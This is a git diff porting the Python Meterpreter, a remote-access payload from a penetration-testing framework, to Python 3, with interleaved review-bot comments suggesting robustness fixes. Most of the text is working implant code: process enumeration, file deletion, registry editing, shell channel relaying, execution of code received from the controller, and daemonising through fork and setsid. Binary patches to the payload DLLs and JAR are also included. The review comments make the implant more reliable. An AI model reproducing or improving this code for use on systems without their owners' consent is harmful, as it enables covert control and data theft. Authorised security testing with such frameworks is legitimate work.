@@ -725,14 +753,14 @@ def stdapi_sys_process_get_processes_via_proc(request, response): def stdapi_sys_process_get_processes_via_ps(request, response): ps_args = ['ps', 'ax', '-w', '-o', 'pid,ppid,user,command'] proc_h = subprocess.Popen(ps_args, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) - ps_output = proc_h.stdout.read() + ps_output = str(proc_h.stdout.read()) ps_output = ps_output.split('\n') ps_output.pop(0) for process in ps_output: process = process.split() if len(process) < 4: break - pgroup = '' + pgroup = bytes() pgroup += tlv_pack(TLV_TYPE_PID, int(process[0])) pgroup += tlv_pack(TLV_TYPE_PARENT_PID, int(process[1])) pgroup += tlv_pack(TLV_TYPE_USER_NAME, process[2]) @@ -793,7 +821,7 @@ def stdapi_sys_process_get_processes_via_windll(request, response): use = ctypes.c_ulong() use.value = 0 ctypes.windll.advapi32.LookupAccountSidA(None, user_tkn.Sid, username, ctypes.byref(u_len), domain, ctypes.byref(d_len), ctypes.byref(use)) - complete_username = ctypes.string_at(domain) + '\\' + ctypes.string_at(username) + complete_username = str(ctypes.string_at(domain)) + '\\' + str(ctypes.string_at(username)) k32.CloseHandle(tkn_h) parch = windll_GetNativeSystemInfo() is_wow64 = ctypes.c_ubyte() @@ -802,7 +830,7 @@ def stdapi_sys_process_get_processes_via_windll(request, response): if k32.IsWow64Process(proc_h, ctypes.byref(is_wow64)): if is_wow64.value: parch = PROCESS_ARCH_X86 - pgroup = '' + pgroup = bytes() pgroup += tlv_pack(TLV_TYPE_PID, pe32.th32ProcessID) pgroup += tlv_pack(TLV_TYPE_PARENT_PID, pe32.th32ParentProcessID) pgroup += tlv_pack(TLV_TYPE_USER_NAME, complete_username) 
@@ -850,16 +878,18 @@ def stdapi_fs_delete_dir(request, response): @meterpreter.register_function def stdapi_fs_delete_file(request, response): file_path = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value'] - os.unlink(file_path) + if os.path.exists(file_path): + os.unlink(file_path) return ERROR_SUCCESS, response @meterpreter.register_function def stdapi_fs_file_expand_path(request, response): path_tlv = packet_get_tlv(request, TLV_TYPE_FILE_PATH)['value'] if has_windll: + path_tlv = ctypes.create_string_buffer(bytes(path_tlv, 'UTF-8')) path_out = (ctypes.c_char * 4096)() - path_out_len = ctypes.windll.kernel32.ExpandEnvironmentStringsA(path_tlv, ctypes.byref(path_out), ctypes.sizeof(path_out)) - result = ''.join(path_out)[:path_out_len] + path_out_len = ctypes.windll.kernel32.ExpandEnvironmentStringsA(ctypes.byref(path_tlv), ctypes.byref(path_out), ctypes.sizeof(path_out)) + result = str(ctypes.string_at(path_out)) elif path_tlv == '%COMSPEC%': result = '/bin/sh' elif path_tlv in ['%TEMP%', '%TMP%']: @@ -912,7 +942,8 @@ def stdapi_fs_md5(request, response): @meterpreter.register_function def stdapi_fs_mkdir(request, response): dir_path = packet_get_tlv(request, TLV_TYPE_DIRECTORY_PATH)['value'] - os.mkdir(dir_path) + if not os.path.isdir(dir_path): + os.mkdir(dir_path) return ERROR_SUCCESS, response @meterpreter.register_function @@ -965,7 +996,7 @@ def stdapi_fs_stat(request, response): @meterpreter.register_function def stdapi_net_config_get_interfaces(request, response): - if hasattr(socket, 'AF_NETLINK'): + if hasattr(socket, 'AF_NETLINK') and hasattr(socket, 'NETLINK_ROUTE'): interfaces = stdapi_net_config_get_interfaces_via_netlink() elif has_osxsc: interfaces = stdapi_net_config_get_interfaces_via_osxsc() 
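Review bot: The `os.path.exists` guard added to stdapi_fs_delete_file in the @@ -850 hunk reports ERROR_SUCCESS for a file that was never there and leaves a window between the check and `os.unlink` in which the path can change; the same check-then-act shape is added to stdapi_fs_mkdir in the @@ -912 hunk. Calling `os.unlink` directly and treating only the not-found error as success keeps other failures, such as a permissions error, visible to the caller. The sketch assumes `errno` is imported in this file, which the hunk does not show. Separately, `path_out_len` from `ExpandEnvironmentStringsA` is no longer used in stdapi_fs_file_expand_path, so a failed call (return value 0) or a result longer than the 4096-byte buffer is returned as if it had succeeded.

```python
def stdapi_fs_delete_file(request, response):
    # … unchanged: file_path lookup …
    try:
        os.unlink(file_path)
    except OSError:
        # only a file that is already gone counts as success
        if sys.exc_info()[1].errno != errno.ENOENT:
            raise
    return ERROR_SUCCESS, response
```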
@@ -974,7 +1005,7 @@ def stdapi_net_config_get_interfaces(request, response): else: return ERROR_FAILURE, response for iface_info in interfaces: - iface_tlv = '' + iface_tlv = bytes() iface_tlv += tlv_pack(TLV_TYPE_MAC_NAME, iface_info.get('name', 'Unknown')) iface_tlv += tlv_pack(TLV_TYPE_MAC_ADDRESS, iface_info.get('hw_addr', '\x00\x00\x00\x00\x00\x00')) if 'mtu' in iface_info: @@ -1002,7 +1033,7 @@ def stdapi_net_config_get_interfaces_via_netlink(): 0x0100: 'PROMISC', 0x1000: 'MULTICAST' } - iface_flags_sorted = iface_flags.keys() + iface_flags_sorted = list(iface_flags.keys()) # Dictionaries don't maintain order iface_flags_sorted.sort() interfaces = {} @@ -1106,7 +1137,7 @@ def stdapi_net_config_get_interfaces_via_osxsc(): hw_addr = hw_addr.replace(':', '') hw_addr = hw_addr.decode('hex') iface_info['hw_addr'] = hw_addr - ifnames = interfaces.keys() + ifnames = list(interfaces.keys()) ifnames.sort() for iface_name, iface_info in interfaces.items(): iface_info['index'] = ifnames.index(iface_name) @@ -1138,7 +1169,10 @@ def stdapi_net_config_get_interfaces_via_windll(): iface_info['index'] = AdapterAddresses.u.s.IfIndex if AdapterAddresses.PhysicalAddressLength: iface_info['hw_addr'] = ctypes.string_at(ctypes.byref(AdapterAddresses.PhysicalAddress), AdapterAddresses.PhysicalAddressLength) - iface_info['name'] = str(ctypes.wstring_at(AdapterAddresses.Description)) + iface_desc = ctypes.wstring_at(AdapterAddresses.Description) + if not is_str(iface_desc): + iface_desc = str(iface_desc) + iface_info['name'] = iface_desc iface_info['mtu'] = AdapterAddresses.Mtu pUniAddr = AdapterAddresses.FirstUnicastAddress while pUniAddr: 
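Review bot: `hw_addr.decode('hex')` in the context lines of the @@ -1106 hunk is Python 2 only, so on Python 3 stdapi_net_config_get_interfaces_via_osxsc would fail before it reaches the `list(interfaces.keys())` line this commit fixes. `hw_addr = binascii.unhexlify(hw_addr)` behaves the same on both versions, assuming `binascii` is imported at the top of the file, which is not visible here. The function starts outside the hunk.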
@@ -1174,7 +1208,7 @@ def stdapi_net_config_get_interfaces_via_windll_mib(): table_data = ctypes.string_at(table, pdwSize.value) entries = struct.unpack('I', table_data[:4])[0] table_data = table_data[4:] - for i in xrange(entries): + for i in range(entries): addrrow = cstruct_unpack(MIB_IPADDRROW, table_data) ifrow = MIB_IFROW() ifrow.dwIndex = addrrow.dwIndex @@ -1244,9 +1278,10 @@ def stdapi_registry_close_key(request, response): def stdapi_registry_create_key(request, response): root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value'] base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value'] + base_key = ctypes.create_string_buffer(bytes(base_key, 'UTF-8')) permission = packet_get_tlv(request, TLV_TYPE_PERMISSION).get('value', winreg.KEY_ALL_ACCESS) res_key = ctypes.c_void_p() - if ctypes.windll.advapi32.RegCreateKeyExA(root_key, base_key, 0, None, 0, permission, None, ctypes.byref(res_key), None) == ERROR_SUCCESS: + if ctypes.windll.advapi32.RegCreateKeyExA(root_key, ctypes.byref(base_key), 0, None, 0, permission, None, ctypes.byref(res_key), None) == ERROR_SUCCESS: response += tlv_pack(TLV_TYPE_HKEY, res_key.value) return ERROR_SUCCESS, response return ERROR_FAILURE, response 
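Review bot: In the @@ -1244 hunk `bytes(base_key, 'UTF-8')` hands UTF-8 to `RegCreateKeyExA`, but the `A` entry points read their string arguments in the system ANSI code page, so a key name with non-ASCII characters would presumably create or open a differently named key on Python 3. The same conversion is added before `SHDeleteKeyA`, `RegDeleteKeyA`, `RegDeleteValueA`, `RegOpenKeyExA` and `RegQueryValueExA` in the @@ -1255, @@ -1335 and @@ -1367 hunks, and before `ExpandEnvironmentStringsA` in @@ -850. The wide variants avoid the code-page dependency: `base_key = ctypes.create_unicode_buffer(base_key)` together with `ctypes.windll.advapi32.RegCreateKeyExW(...)`. How Python 2 byte strings should be converted for that call is not visible here and would need checking.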
@@ -1255,18 +1290,20 @@ def stdapi_registry_create_key(request, response): def stdapi_registry_delete_key(request, response): root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value'] base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value'] + base_key = ctypes.create_string_buffer(bytes(base_key, 'UTF-8')) flags = packet_get_tlv(request, TLV_TYPE_FLAGS)['value'] if (flags & DELETE_KEY_FLAG_RECURSIVE): - result = ctypes.windll.shlwapi.SHDeleteKeyA(root_key, base_key) + result = ctypes.windll.shlwapi.SHDeleteKeyA(root_key, ctypes.byref(base_key)) else: - result = ctypes.windll.advapi32.RegDeleteKeyA(root_key, base_key) + result = ctypes.windll.advapi32.RegDeleteKeyA(root_key, ctypes.byref(base_key)) return result, response @meterpreter.register_function_windll def stdapi_registry_delete_value(request, response): root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value'] value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value'] - result = ctypes.windll.advapi32.RegDeleteValueA(root_key, value_name) + value_name = ctypes.create_string_buffer(bytes(value_name, 'UTF-8')) + result = ctypes.windll.advapi32.RegDeleteValueA(root_key, ctypes.byref(value_name)) return result, response @meterpreter.register_function_windll 
@@ -1335,9 +1372,10 @@ def stdapi_registry_load_key(request, response):
 def stdapi_registry_open_key(request, response):
 root_key = packet_get_tlv(request, TLV_TYPE_ROOT_KEY)['value']
 base_key = packet_get_tlv(request, TLV_TYPE_BASE_KEY)['value']
+ base_key = ctypes.create_string_buffer(bytes(base_key, 'UTF-8'))
 permission = packet_get_tlv(request, TLV_TYPE_PERMISSION).get('value', winreg.KEY_ALL_ACCESS)
 handle_id = ctypes.c_void_p()
- if ctypes.windll.advapi32.RegOpenKeyExA(root_key, base_key, 0, permission, ctypes.byref(handle_id)) == ERROR_SUCCESS:
+ if ctypes.windll.advapi32.RegOpenKeyExA(root_key, ctypes.byref(base_key), 0, permission, ctypes.byref(handle_id)) == ERROR_SUCCESS:
 response += tlv_pack(TLV_TYPE_HKEY, handle_id.value)
 return ERROR_SUCCESS, response
 return ERROR_FAILURE, response
@@ -1367,24 +1405,26 @@ def stdapi_registry_query_class(request, response): @meterpreter.register_function_windll def stdapi_registry_query_value(request, response): - REG_SZ = 1 - REG_DWORD = 4 hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value'] value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value'] + value_name = ctypes.create_string_buffer(bytes(value_name, 'UTF-8')) value_type = ctypes.c_uint32() value_type.value = 0 value_data = (ctypes.c_ubyte * 4096)() value_data_sz = ctypes.c_uint32() value_data_sz.value = ctypes.sizeof(value_data) - result = ctypes.windll.advapi32.RegQueryValueExA(hkey, value_name, 0, ctypes.byref(value_type), value_data, ctypes.byref(value_data_sz)) + result = ctypes.windll.advapi32.RegQueryValueExA(hkey, ctypes.byref(value_name), 0, ctypes.byref(value_type), value_data, ctypes.byref(value_data_sz)) if result == ERROR_SUCCESS: response += tlv_pack(TLV_TYPE_VALUE_TYPE, value_type.value) - if value_type.value == REG_SZ: - response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data) + '\x00') - elif value_type.value == REG_DWORD: + if value_type.value == winreg.REG_SZ: + response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data) + NULL_BYTE) + elif value_type.value == winreg.REG_DWORD: value = value_data[:4] value.reverse() - value = ''.join(map(chr, value)) + if sys.version_info[0] < 3: + value = ''.join(map(chr, value)) + else: + value = bytes(value) response += tlv_pack(TLV_TYPE_VALUE_DATA, value) else: response += tlv_pack(TLV_TYPE_VALUE_DATA, ctypes.string_at(value_data, value_data_sz.value)) 
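Review bot: The REG_SZ branch of stdapi_registry_query_value still calls `ctypes.string_at(value_data)` without a length, so it reads up to the first NUL instead of the `value_data_sz` bytes the API reported. A string value is not required to be stored with a terminator, so one that fills the 4096-byte buffer is read past its end. Bounding it the way the final `else` branch already does avoids that: `ctypes.string_at(value_data, value_data_sz.value).split(NULL_BYTE, 1)[0] + NULL_BYTE`. Values larger than the fixed buffer return ERROR_MORE_DATA; the handling of a non-success result is outside this hunk, so it is worth confirming that case is reported rather than silently dropped.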
@@ -1395,9 +1435,10 @@ def stdapi_registry_query_value(request, response): def stdapi_registry_set_value(request, response): hkey = packet_get_tlv(request, TLV_TYPE_HKEY)['value'] value_name = packet_get_tlv(request, TLV_TYPE_VALUE_NAME)['value'] + value_name = ctypes.create_string_buffer(bytes(value_name, 'UTF-8')) value_type = packet_get_tlv(request, TLV_TYPE_VALUE_TYPE)['value'] value_data = packet_get_tlv(request, TLV_TYPE_VALUE_DATA)['value'] - result = ctypes.windll.advapi32.RegSetValueExA(hkey, value_name, 0, value_type, value_data, len(value_data)) + result = ctypes.windll.advapi32.RegSetValueExA(hkey, ctypes.byref(value_name), 0, value_type, value_data, len(value_data)) return result, response @meterpreter.register_function_windll diff --git a/data/meterpreter/ext_server_stdapi.x64.dll b/data/meterpreter/ext_server_stdapi.x64.dll index d298f5525ec761cbb55e6ba4694cceee8368b931..c4a2aec8f3ac0dc511ba7d04899e4f9348ac46d0 100755 GIT binary patch delta 54 zcmZpeAlWcMa)SgTv&#JmlcgE`7@3;07~8WLL6`}MnYU*#vT)r2Nw=5ZW!YYSm$fqs E0Ly9;00000 delta 54 zcmZpeAlWcMa)SgT^O}DhlcgE`7#*9l7~8WLL6`}MnYU*#vT)r2Nw=5ZW!YYSm$fqs E0QZj*eE<Le diff --git a/data/meterpreter/ext_server_stdapi.x86.dll b/data/meterpreter/ext_server_stdapi.x86.dll index 747a9697261347bb3dd1183692e6dae516cab456..25fba086ee3e525dbd652accdcdcd55454b5bb0e 100755 GIT binary patch delta 66 zcmZo@5pQS_-=M(Ayyo77$;ynr9C}%73``6RjMEqVW|3%~z}P;45rmn5n0fmIMi!Ay Rkka<$T`b#|cd<sA0|2%z6~O=i delta 66 zcmZo@5pQS_-=M(A9QUtdvNEGDN7G6+1||ju#_0=wvq&^gU~Hej2*ON2%)EU9Ba28U QNNM}>E|%@fyI3R50m9K0=l}o! diff --git a/data/meterpreter/meterpreter.jar b/data/meterpreter/meterpreter.jar index 06d20d28ab38d721c974cdae288163d6997fab73..6754a37228bb55a53ba3ba32d1d8bea8822755a9 100644 GIT binary patch delta 36 pcmaF8kMZ?B#tEh@F(=bQCR#ePe&Ko4duC%JZx~o)^Q5qw8~`%z5I_I` delta 36 pcmaF8kMZ?B#tEh@UbEf_O|*1o{mS#GmuF)mZx~o)^Q5qw8~`XE4~YN( 
diff --git a/data/meterpreter/meterpreter.py b/data/meterpreter/meterpreter.py index 979ebb4107..7ed0222f35 100644 --- a/data/meterpreter/meterpreter.py +++ b/data/meterpreter/meterpreter.py @@ -1,12 +1,5 @@ #!/usr/bin/python import code -try: - import ctypes -except: - has_windll = False -else: - has_windll = hasattr(ctypes, 'windll') - import os import random import select @@ -15,10 +8,30 @@ import struct import subprocess import sys import threading +import time +import traceback + +try: + import ctypes +except ImportError: + has_windll = False +else: + has_windll = hasattr(ctypes, 'windll') + +if sys.version_info[0] < 3: + is_bytes = lambda obj: issubclass(obj.__class__, str) + bytes = lambda *args: str(*args[:1]) + NULL_BYTE = '\x00' +else: + is_bytes = lambda obj: issubclass(obj.__class__, bytes) + str = lambda x: __builtins__['str'](x, 'UTF-8') + NULL_BYTE = bytes('\x00', 'UTF-8') # # Constants # +DEBUGGING = False + PACKET_TYPE_REQUEST = 0 PACKET_TYPE_RESPONSE = 1 PACKET_TYPE_PLAIN_REQUEST = 10 @@ -100,6 +113,7 @@ TLV_TYPE_LOCAL_HOST = TLV_META_TYPE_STRING | 1502 TLV_TYPE_LOCAL_PORT = TLV_META_TYPE_UINT | 1503 EXPORTED_SYMBOLS = {} +EXPORTED_SYMBOLS['DEBUGGING'] = DEBUGGING def export(symbol): EXPORTED_SYMBOLS[symbol.__name__] = symbol @@ -107,7 +121,7 @@ def export(symbol): def generate_request_id(): chars = 'abcdefghijklmnopqrstuvwxyz' - return ''.join(random.choice(chars) for x in xrange(32)) + return ''.join(random.choice(chars) for x in range(32)) @export def inet_pton(family, address): 
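Review bot: In the compatibility block of the second hunk, `str = lambda x: __builtins__['str'](x, 'UTF-8')` relies on `__builtins__` being a dict, which is a CPython detail that only holds when the file is not the `__main__` module; run as a script it is a module object and the subscript raises TypeError. Rebinding `str` to a one-argument decoder also means any later `str(5)` or `isinstance(x, str)` in this file or in loaded extensions fails on Python 3. Capturing the builtin first and using a separate name is safer, for example `_str = str` followed by `to_str = lambda x: _str(x, 'UTF-8')`. How the file is loaded is not visible here, so the first failure mode should be confirmed against the stager.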
@@ -125,25 +139,6 @@ def inet_pton(family, address): return ''.join(map(chr, lpAddress[8:24])) raise Exception('no suitable inet_pton functionality is available') -@export -def packet_get_tlv(pkt, tlv_type): - offset = 0 - while (offset < len(pkt)): - tlv = struct.unpack('>II', pkt[offset:offset+8]) - if (tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type: - val = pkt[offset+8:(offset+8+(tlv[0] - 8))] - if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING: - val = val.split('\x00', 1)[0] - elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT: - val = struct.unpack('>I', val)[0] - elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL: - val = bool(struct.unpack('b', val)[0]) - elif (tlv[1] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW: - pass - return {'type':tlv[1], 'length':tlv[0], 'value':val} - offset += tlv[0] - return {} - @export def packet_enum_tlvs(pkt, tlv_type = None): offset = 0 @@ -152,7 +147,7 @@ def packet_enum_tlvs(pkt, tlv_type = None): if (tlv_type == None) or ((tlv[1] & ~TLV_META_TYPE_COMPRESSED) == tlv_type): val = pkt[offset+8:(offset+8+(tlv[0] - 8))] if (tlv[1] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING: - val = val.split('\x00', 1)[0] + val = str(val.split(NULL_BYTE, 1)[0]) elif (tlv[1] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT: val = struct.unpack('>I', val)[0] elif (tlv[1] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL: @@ -163,6 +158,14 @@ def packet_enum_tlvs(pkt, tlv_type = None): offset += tlv[0] raise StopIteration() +@export +def packet_get_tlv(pkt, tlv_type): + try: + tlv = list(packet_enum_tlvs(pkt, tlv_type))[0] + except IndexError: + return {} + return tlv + @export def tlv_pack(*args): if len(args) == 2: 
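Review bot: The new `packet_get_tlv` builds `list(packet_enum_tlvs(pkt, tlv_type))` and takes element 0, so every lookup decodes the whole packet and drives the generator to its trailing `raise StopIteration()`. From Python 3.7 on, PEP 479 converts a StopIteration raised inside a generator into RuntimeError, which `except IndexError` does not catch. `return next(packet_enum_tlvs(pkt, tlv_type), {})` stops at the first match, and the generator should end with a plain `return`. The loop header of packet_enum_tlvs is outside the hunk, but from the visible `offset += tlv[0]` a length field of zero would never advance the offset, so a check such as `if tlv[0] < 8: break` looks needed before the slice.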
@@ -170,20 +173,33 @@ def tlv_pack(*args): else: tlv = args[0] data = "" - if (tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING: - data = struct.pack('>II', 8 + len(tlv['value']) + 1, tlv['type']) + tlv['value'] + '\x00' - elif (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT: + if (tlv['type'] & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT: data = struct.pack('>III', 12, tlv['type'], tlv['value']) elif (tlv['type'] & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL: - data = struct.pack('>II', 9, tlv['type']) + chr(int(bool(tlv['value']))) - elif (tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW: - data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value'] - elif (tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP: - data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value'] - elif (tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX: - data = struct.pack('>II', 8 + len(tlv['value']), tlv['type']) + tlv['value'] + data = struct.pack('>II', 9, tlv['type']) + bytes(chr(int(bool(tlv['value']))), 'UTF-8') + else: + value = tlv['value'] + if not is_bytes(value): + value = bytes(value, 'UTF-8') + if (tlv['type'] & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING: + data = struct.pack('>II', 8 + len(value) + 1, tlv['type']) + value + NULL_BYTE + elif (tlv['type'] & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW: + data = struct.pack('>II', 8 + len(value), tlv['type']) + value + elif (tlv['type'] & TLV_META_TYPE_GROUP) == TLV_META_TYPE_GROUP: + data = struct.pack('>II', 8 + len(value), tlv['type']) + value + elif (tlv['type'] & TLV_META_TYPE_COMPLEX) == TLV_META_TYPE_COMPLEX: + data = struct.pack('>II', 8 + len(value), tlv['type']) + value return data +#@export +class MeterpreterFile(object): + def __init__(self, file_obj): + self.file_obj = file_obj + + def __getattr__(self, name): + return getattr(self.file_obj, name) +export(MeterpreterFile) + #@export class MeterpreterSocket(object): def __init__(self, sock): 
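Review bot: In tlv_pack the initial `data = ""` is left as a text string while every branch now produces bytes, so a type that matches none of the branches returns `""`. On Python 3 the callers' `response += tlv_pack(...)` then raises TypeError instead of appending nothing. `data = bytes()` keeps the return type uniform, and an explicit `raise ValueError` for an unknown meta type would surface the mistake earlier. The first lines of tlv_pack are outside this hunk.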
@@ -208,11 +224,11 @@ class STDProcessBuffer(threading.Thread): threading.Thread.__init__(self) self.std = std self.is_alive = is_alive - self.data = '' + self.data = bytes() self.data_lock = threading.RLock() def run(self): - for byte in iter(lambda: self.std.read(1), ''): + for byte in iter(lambda: self.std.read(1), bytes()): self.data_lock.acquire() self.data += byte self.data_lock.release() @@ -220,15 +236,20 @@ class STDProcessBuffer(threading.Thread): def is_read_ready(self): return len(self.data) != 0 - def read(self, l = None): - data = '' + def peek(self, l = None): + data = bytes() self.data_lock.acquire() if l == None: data = self.data - self.data = '' else: data = self.data[0:l] - self.data = self.data[l:] + self.data_lock.release() + return data + + def read(self, l = None): + self.data_lock.acquire() + data = self.peek(l) + self.data = self.data[len(data):] self.data_lock.release() return data @@ -236,12 +257,25 @@ class STDProcessBuffer(threading.Thread): class STDProcess(subprocess.Popen): def __init__(self, *args, **kwargs): subprocess.Popen.__init__(self, *args, **kwargs) + self.echo_protection = False def start(self): self.stdout_reader = STDProcessBuffer(self.stdout, lambda: self.poll() == None) self.stdout_reader.start() self.stderr_reader = STDProcessBuffer(self.stderr, lambda: self.poll() == None) self.stderr_reader.start() + + def write(self, channel_data): + self.stdin.write(channel_data) + self.stdin.flush() + if self.echo_protection: + end_time = time.time() + 0.5 + out_data = bytes() + while (time.time() < end_time) and (out_data != channel_data): + if self.stdout_reader.is_read_ready(): + out_data = self.stdout_reader.peek(len(channel_data)) + if out_data == channel_data: + self.stdout_reader.read(len(channel_data)) export(STDProcess) class PythonMeterpreter(object): 
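Review bot: The new `STDProcess.write` spins for up to half a second in `while (time.time() < end_time) and (out_data != channel_data)` with no wait between iterations, so every write to an echo-protected process burns a full core until the echo arrives or the deadline passes. A short pause in the loop body, `time.sleep(0.01)`, is enough. `is_read_ready` also reads `len(self.data)` without taking `data_lock`, unlike `peek` and `read`. The comparison only matches when the echoed bytes are the first bytes buffered, so output already queued from an earlier command makes the loop run to the timeout and leaves the echo in the stream; that limitation deserves a comment on the method.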
@@ -251,7 +285,7 @@ class PythonMeterpreter(object): self.channels = {} self.interact_channels = [] self.processes = {} - for func in filter(lambda x: x.startswith('_core'), dir(self)): + for func in list(filter(lambda x: x.startswith('_core'), dir(self))): self.extension_functions[func[1:]] = getattr(self, func) self.running = True @@ -265,6 +299,7 @@ class PythonMeterpreter(object): return func def add_channel(self, channel): + assert(isinstance(channel, (subprocess.Popen, MeterpreterFile, MeterpreterSocket))) idx = 0 while idx in self.channels: idx += 1 @@ -286,7 +321,7 @@ class PythonMeterpreter(object): break req_length, req_type = struct.unpack('>II', request) req_length -= 8 - request = '' + request = bytes() while len(request) < req_length: request += self.socket.recv(4096) response = self.create_response(request) @@ -294,17 +329,17 @@ class PythonMeterpreter(object): else: channels_for_removal = [] # iterate over the keys because self.channels could be modified if one is closed - channel_ids = self.channels.keys() + channel_ids = list(self.channels.keys()) for channel_id in channel_ids: channel = self.channels[channel_id] - data = '' + data = bytes() if isinstance(channel, STDProcess): if not channel_id in self.interact_channels: continue - if channel.stdout_reader.is_read_ready(): - data = channel.stdout_reader.read() - elif channel.stderr_reader.is_read_ready(): + if channel.stderr_reader.is_read_ready(): data = channel.stderr_reader.read() + elif channel.stdout_reader.is_read_ready(): + data = channel.stdout_reader.read() elif channel.poll() != None: self.handle_dead_resource_channel(channel_id) elif isinstance(channel, MeterpreterSocketClient): @@ -312,7 +347,7 @@ class PythonMeterpreter(object): try: d = channel.recv(1) except socket.error: - d = '' + d = bytes() if len(d) == 0: self.handle_dead_resource_channel(channel_id) break 
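Review bot: In the request loop of the third hunk, `request += self.socket.recv(4096)` is not limited to the bytes still missing, so it can read past `req_length` into the next packet, and a closed connection (empty read) never ends the `while`. Reading only the remainder and stopping on an empty chunk fixes both: `chunk = self.socket.recv(req_length - len(request))` then `if not chunk: break`. The enclosing method starts outside the hunk, so how a short request is handled after the loop should be checked there. Separately, the `assert(isinstance(...))` added to add_channel disappears under `python -O`; `raise TypeError` keeps the check.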
@@ -357,13 +392,13 @@ class PythonMeterpreter(object): data_tlv = packet_get_tlv(request, TLV_TYPE_DATA) if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED: return ERROR_FAILURE - preloadlib_methods = self.extension_functions.keys() + preloadlib_methods = list(self.extension_functions.keys()) symbols_for_extensions = {'meterpreter':self} symbols_for_extensions.update(EXPORTED_SYMBOLS) i = code.InteractiveInterpreter(symbols_for_extensions) i.runcode(compile(data_tlv['value'], '', 'exec')) - postloadlib_methods = self.extension_functions.keys() - new_methods = filter(lambda x: x not in preloadlib_methods, postloadlib_methods) + postloadlib_methods = list(self.extension_functions.keys()) + new_methods = list(filter(lambda x: x not in preloadlib_methods, postloadlib_methods)) for method in new_methods: response += tlv_pack(TLV_TYPE_METHOD, method) return ERROR_SUCCESS, response @@ -386,10 +421,10 @@ class PythonMeterpreter(object): if channel_id not in self.channels: return ERROR_FAILURE, response channel = self.channels[channel_id] - if isinstance(channel, file): - channel.close() - elif isinstance(channel, subprocess.Popen): + if isinstance(channel, subprocess.Popen): channel.kill() + elif isinstance(channel, MeterpreterFile): + channel.close() elif isinstance(channel, MeterpreterSocket): channel.close() else: @@ -405,7 +440,7 @@ class PythonMeterpreter(object): return ERROR_FAILURE, response channel = self.channels[channel_id] result = False - if isinstance(channel, file): + if isinstance(channel, MeterpreterFile): result = channel.tell() >= os.fstat(channel.fileno()).st_size response += tlv_pack(TLV_TYPE_BOOL, result) return ERROR_SUCCESS, response 
@@ -432,13 +467,13 @@ class PythonMeterpreter(object): return ERROR_FAILURE, response channel = self.channels[channel_id] data = '' - if isinstance(channel, file): - data = channel.read(length) - elif isinstance(channel, STDProcess): + if isinstance(channel, STDProcess): if channel.poll() != None: self.handle_dead_resource_channel(channel_id) if channel.stdout_reader.is_read_ready(): data = channel.stdout_reader.read(length) + elif isinstance(channel, MeterpreterFile): + data = channel.read(length) elif isinstance(channel, MeterpreterSocket): data = channel.recv(length) else: @@ -454,13 +489,13 @@ class PythonMeterpreter(object): return ERROR_FAILURE, response channel = self.channels[channel_id] l = len(channel_data) - if isinstance(channel, file): - channel.write(channel_data) - elif isinstance(channel, subprocess.Popen): + if isinstance(channel, subprocess.Popen): if channel.poll() != None: self.handle_dead_resource_channel(channel_id) return ERROR_FAILURE, response - channel.stdin.write(channel_data) + channel.write(channel_data) + elif isinstance(channel, MeterpreterFile): + channel.write(channel_data) elif isinstance(channel, MeterpreterSocket): try: l = channel.send(channel_data) 
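Review bot: In the write handler (second hunk) the branch tests `isinstance(channel, subprocess.Popen)` but now calls `channel.write(channel_data)`, a method that only `STDProcess` defines. add_channel accepts any `subprocess.Popen`, so a plain Popen channel would raise AttributeError here where the removed `channel.stdin.write(...)` worked. Testing `isinstance(channel, STDProcess)` as the read handler does, and keeping `channel.stdin.write` for other Popen objects, closes the gap. In the read handler the context line `data = ''` is still text while the rest of the commit switched such defaults to `bytes()`.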
@@ -485,13 +520,17 @@ class PythonMeterpreter(object): if handler_name in self.extension_functions: handler = self.extension_functions[handler_name] try: - #print("[*] running method {0}".format(handler_name)) + if DEBUGGING: + print('[*] running method ' + handler_name) result, resp = handler(request, resp) - except Exception, err: - #print("[-] method {0} resulted in an error".format(handler_name)) + except Exception: + if DEBUGGING: + print('[-] method ' + handler_name + ' resulted in an error') + traceback.print_exc(file=sys.stderr) result = ERROR_FAILURE else: - #print("[-] method {0} was requested but does not exist".format(handler_name)) + if DEBUGGING: + print('[-] method ' + handler_name + ' was requested but does not exist') result = ERROR_FAILURE resp += tlv_pack(TLV_TYPE_RESULT, result) resp = struct.pack('>I', len(resp) + 4) + resp @@ -499,6 +538,9 @@ class PythonMeterpreter(object): if not hasattr(os, 'fork') or (hasattr(os, 'fork') and os.fork() == 0): if hasattr(os, 'setsid'): - os.setsid() + try: + os.setsid() + except OSError: + pass met = PythonMeterpreter(s) met.run() diff --git 